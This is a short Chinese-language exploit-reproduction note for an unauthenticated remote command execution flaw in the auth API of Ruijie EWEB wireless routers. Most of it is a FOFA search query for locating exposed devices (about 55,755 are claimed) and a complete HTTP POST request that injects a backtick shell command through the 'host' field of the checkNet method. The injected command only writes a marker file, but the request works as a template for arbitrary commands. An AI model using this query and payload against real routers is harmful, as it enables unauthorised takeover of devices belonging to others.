产品简介
锐捷网络EWEB路由器是锐捷网络股份有限公司的一款无线路由设备。
漏洞描述
锐捷EWEB路由器auth接口可在身份未验证的情况下执行任意命令,可以获取服务器权限,存在远程命令执行漏洞。
fofa
body=”cgi-bin/luci” && body=”#f47f3e”
影响数量55,755个
漏洞复现
POST /cgi-bin/luci/api/auth HTTP/1.1
Host:
Content-Type: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 73
{"method":"checkNet","params":{"host":"`echo qqwweerrqqq>qqwweerr.txt`"}}